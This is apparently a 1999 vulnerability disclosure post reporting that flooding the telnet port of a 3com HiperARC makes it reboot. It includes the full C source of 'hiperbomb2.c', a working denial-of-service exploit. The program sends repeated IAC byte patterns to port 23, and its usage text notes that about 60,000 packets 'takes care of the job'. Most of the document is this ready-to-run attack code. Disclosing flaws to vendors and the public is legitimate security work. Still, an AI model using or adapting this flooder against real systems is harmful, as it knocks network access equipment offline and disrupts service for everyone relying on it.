Hello, The attached program will reboot a 3com HiperARC. I made an attempt to contact 3com before posting this report, however, I received no response. By flooding the telnet port of a 3com HiperARC using the provided program, the HiperARC unconditionally reboots. This program is effective over all interfaces, including a dialup. Regards, Jonathan Chapman Director of Network Security FIRST Incorporated [EMAIL PROTECTED] www.1st.net
/* --------------------------------------------------------------------- * hiperbomb2.c - Reboots HiperARC faster. * --------------------------------------------------------------------- * (c) 1999 - Jonathan Chapman <[EMAIL PROTECTED]> * --------------------------------------------------------------------- * Sends a high volume of IACs which eventually leads to a reboot of the * HiperARC. Brief testing indicated that this problem is most likely * specific to sending IACs rather than any other type of data. Further * research has shown that specific IAC patterns are more likely to cause * a reboot. In this example I use one of the most efficient combinations * I have discovered. Through my testing it usually required at least * 60,000 packets to cause the HiperARC to reboot. * --------------------------------------------------------------------- */ #include <stdio.h> #include <stdarg.h> #include <fcntl.h> #include <netdb.h> #include <netinet/in.h> #include <sys/socket.h> char *chassis; int sockfd, num_of_tries; void connect_to_chassis(char *name) { struct hostent *host; struct sockaddr_in remote; host = gethostbyname(name); if(!host) { fprintf(stderr, "Cannot resolve host %s.\n", name); exit(3); } sockfd = socket(AF_INET, SOCK_STREAM, 0); if(sockfd < 0) { fprintf(stderr, "Cannot obtain descriptor.\n"); exit(4); } remote.sin_family = AF_INET; remote.sin_addr = *(struct in_addr *)*host->h_addr_list; remote.sin_port = htons(23); connect(sockfd, (struct sockaddr *)&remote, sizeof(remote)); return; } void send_iacs() { unsigned char reply[3] = {254, 36, 185}; unsigned int k; for(k = 0; k < num_of_tries; k++) { write(sockfd, reply, 3); } } int main(int ac, char **av) { if(ac < 3) { fprintf(stderr, "Syntax: %s <chassis name> <num of packets>\n", av[0]); fprintf(stderr, "Approximately 60,000 packets usually takes care of the job.\n"); exit(2); } chassis = av[1]; num_of_tries = atoi(av[2]); fprintf(stderr, "Beginning attack on chassis %s [%d packets]\n", chassis, num_of_tries); connect_to_chassis(chassis); send_iacs(); fprintf(stderr, "Attack complete.\n"); exit(0); }